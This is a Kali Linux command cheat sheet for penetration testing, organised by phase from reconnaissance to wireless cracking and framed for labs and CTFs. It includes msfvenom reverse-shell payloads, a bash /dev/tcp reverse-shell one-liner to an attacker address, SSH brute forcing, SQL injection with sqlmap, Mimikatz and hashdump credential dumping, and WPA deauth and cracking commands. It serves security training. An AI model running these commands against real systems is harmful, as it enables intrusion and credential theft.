๐ Kali Linux CLI Cheat Sheet
Organized by engagement phase. Verified commands โ built from scratch.
Ethics first: These commands are for labs, CTFs, and systems you have explicit written permission to test โ TryHackMe, HackTheBox, VulnHub, or your own VM lab. Never run them against targets you don't own or aren't authorized to test.
Daily Driver โ file ops, networking, text processing
Navigation & files
pwdshow your current directoryls -lalist all files, including hidden ones, with detailscd /path/cd ..โ move into a directory / go up one levelfind /path -name "*.txt" 2>/dev/nullsearch for files by name, hiding permission errorslocate filenamefast filename search (run `updatedb` first to refresh its index)cp -r src/ dst/copy files or whole directoriesmv old newmove or rename filesrm -rf dir/delete a directory and everything in it (no undo โ be careful)mkdir -p a/b/ccreate nested directories in one shottouch filecreate an empty file or update its timestampchmod +x script.shmake a file executablechown user:group filechange a file's owner and grouptar -xzvf file.tar.gzextract a .tar.gz archiveunzip file.zipextract a .zip archive
Viewing & processing text
cat fileprint a whole file to the screenless filescroll through a file page by page (q to quit)head -n 20 file/tail -n 20 fileโ show the first / last 20 linestail -f /var/log/auth.logwatch a log file update in real timegrep -r "password" . 2>/dev/nullsearch every file under here for a stringgrep -i "pattern" filecase-insensitive search in one filecut -d: -f1 /etc/passwdprint the first colon-separated field of each lineawk '{print $1, $3}' fileprint the 1st and 3rd whitespace-separated columnssort file | uniq -c | sort -nrcount how often each unique line appears, most common firstwc -l filecount the lines in a filestrings binarypull readable text out of a binary file
Networking basics
ip ashow your interfaces and IP addressesip rshow the routing table (reveals the gateway)ping -c 4 10.0.0.1send 4 pings to check connectivityss -tulnlist all listening TCP/UDP ports on this machinecurl -I https://targetfetch just the HTTP headers from a sitecurl -s https://target | head -c 500quietly grab the first 500 bytes of a pagewget http://target/filedownload a file over HTTPssh user@10.0.0.5 -i key.pemSSH in using a private key filescp file user@10.0.0.5:/tmp/securely copy a file to a remote hostpython3 -m http.server 8000serve the current directory over HTTP (handy for transferring files to a target)nc -lvnp 4444netcat listener: wait for an incoming connection on port 4444nc 10.0.0.5 4444connect to a host on port 4444
Recon & Enumeration
Host & port discovery
nmap -sn 192.168.1.0/24ping sweep: find which hosts are alive on the subnetnmap -sS -Pn 10.0.0.5stealth SYN scan without host discovery (avoids ping-based detection)nmap -sV -sC -O -p- 10.0.0.5full port scan with service/version detection, default scripts, and OS fingerprintingnmap -A 10.0.0.5aggressive scan: OS, versions, scripts, traceroute in one gonmap -sU --top-ports 20 10.0.0.5scan the 20 most common UDP ports (slow but often overlooked)nmap -oN scan.txt 10.0.0.5save scan results to a text filemasscan -p1-65535 10.0.0.0/24 --rate=1000extremely fast scan of all 65k ports across a subnet
Web enumeration
whatweb http://10.0.0.5fingerprint the technologies a website runs ongobuster dir -u http://10.0.0.5 -w /usr/share/wordlists/dirb/common.txtbrute-force hidden directories and filesffuf -u http://10.0.0.5/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txtfast web fuzzer for paths, params, or vhostsnikto -h http://10.0.0.5scan a web server for known misconfigurations and outdated softwarewpscan --url http://10.0.0.5enumerate WordPress users, plugins, themes, and known vulnsnuclei -u http://10.0.0.5run community vulnerability templates against a target
SMB / Windows / network services
enum4linux -a 10.0.0.5enumerate everything SMB: users, shares, policies, OS infosmbclient -L //10.0.0.5list the SMB shares on a hostsmbclient //10.0.0.5/share -U guestconnect to an SMB share as a userrpcclient -U "" -N 10.0.0.5open a null-session RPC connection to query users and groupsldapsearch -x -h 10.0.0.5 -s basequery the LDAP root for directory infosnmpwalk -c public -v2c 10.0.0.5walk the SNMP tree with the default community string
DNS & OSINT
dig target.com anypull all DNS records for a domainhost -t mx target.comlook up a domain's mail serversnslookup target.comsimple DNS lookupdnsenum target.combrute-force subdomains and zone-transfer attemptswhois target.comregistration and ownership details for a domaintheHarvester -d target.com -b googleharvest emails, subdomains, and names from public sources
Exploitation
Metasploit workflow
msfconsolelaunch the Metasploit Framework consolesearch smbsearch loaded modules by keyword (inside msfconsole)use exploit/...select a module to work withshow optionssee what the module needs configuredset RHOSTS 10.0.0.5/set LHOST 10.0.0.10โ set target and your callback addressrun(orexploit) โ launch the module
Payload generation
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444 -f elf -o shell.elfbuild a Linux reverse-shell payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444 -f exe -o shell.exebuild a Windows reverse-shell payload
Finding & using exploits
searchsploit apache 2.4search the local Exploit-DB copy by software and versionsearchsploit -m 12345copy exploit #12345 into your current directory
Credential attacks
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.5 -t 4brute-force SSH login with 4 parallel tasksjohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txtcrack password hashes with John the Ripperhashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txtGPU-accelerated cracking (mode 0 = MD5, attack 0 = dictionary)
Web exploitation
sqlmap -u "http://10.0.0.5/page?id=1" --dbstest a URL parameter for SQL injection and list databasessqlmap -u "http://10.0.0.5/page?id=1" -D dbname --tableslist tables inside a database once injection is confirmed
Shells
nc -lvnp 4444catch an incoming reverse shell on your machine/bin/bash -i >& /dev/tcp/10.0.0.10/4444 0>&1classic bash reverse shell one-liner (run on the target)python3 -c 'import pty;pty.spawn("/bin/bash")'upgrade a dumb shell to a proper interactive TTY
Post-Exploitation
Situational awareness (run on the compromised host)
whoami/idโ who are you and what groups are you inhostname/uname -aโ machine name and kernel/OS versionps auxlist all running processes (look for odd ones)ss -tulnplistening ports and which process owns eachenvenvironment variables (sometimes hold credentials)historypreviously typed commands (often leak passwords)
Privilege escalation recon
sudo -lshow what you can run as root without a passwordfind / -perm -4000 -type f 2>/dev/nullfind SUID binaries (a classic privesc path)cat /etc/crontab/crontab -lโ scheduled tasks that may run as rootls -la /etc/shadowcheck whether the password hash file is readablelinpeas.shrun LinPEAS, the go-to automated Linux privesc enumeration script
Meterpreter (once you have a Meterpreter session)
getuid/sysinfoโ current user and system detailsgetsystemattempt automatic privilege escalation to SYSTEM/rootmigrate <PID>move into a more stable processhashdumpdump local password hashesupload / downloadmove files to and from the target
Pivoting & lateral movement
ssh -D 9050 user@10.0.0.5open a SOCKS proxy through a compromised host for pivotingproxychains nmap -sT 10.1.0.0/24scan an internal subnet through your proxy (configure /etc/proxychains.conf first)bloodhound-python -u user -p 'pass' -d domain.local -c all -ns 10.0.0.5collect Active Directory data for BloodHound attack-path mappingsekurlsa::logonpasswordsdump plaintext credentials from memory (Mimikatz, on Windows targets)
Wireless
Setup
iwconfigcheck wireless interfaces and their modeairmon-ng check killkill processes that interfere with monitor modeairmon-ng start wlan0put the adapter into monitor mode (becomes wlan0mon)
Survey & capture
airodump-ng wlan0monpassively list nearby networks, clients, and channelsairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0monlock onto one network's channel and save its traffic to filesaireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0monsend 5 deauth frames to force a client to reconnect (captures the WPA handshake)
Cracking
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.capdictionary-attack a captured WPA handshakehcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1capture PMKIDs (no clients needed)hcxpcapngtool -o hashes.hc22000 dump.pcapngconvert the capture into Hashcat formathashcat -m 22000 hashes.hc22000 /usr/share/wordlists/rockyou.txtcrack WPA handshakes/PMKIDs on the GPU
Other tools
wifiteautomated wireless auditing: scans, captures, and cracks with minimal inputreaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vvattack WPS PIN on routers that leave WPS enabled
*Keep this file as your desk reference. Pair it with a Kali VM and legal labs (TryHackMe, HackTheBox) to practice each phase hands-on.*
ยฉ 2026 Daniel Fernandez ยท For labs, CTFs, and authorized targets only.